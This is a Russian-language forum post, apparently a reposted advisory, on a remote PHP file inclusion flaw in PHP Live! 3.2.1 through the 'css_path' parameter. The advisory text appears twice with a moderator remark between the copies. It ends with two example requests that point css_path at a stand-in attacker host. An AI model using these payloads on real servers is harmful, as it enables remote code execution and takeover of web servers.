PHP-инклюдинг в PHP Live
Уязвимый продукт: PHP Live! 3.2.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "css_path" в сценариях help.php и setup/header.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
[mod][Ŧ1LAN:] прежде чем постить смотрим правила. пока без минуса.[/mod]
Уязвимый продукт: PHP Live! 3.2.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "css_path" в сценариях help.php и setup/header.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
Код:
help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker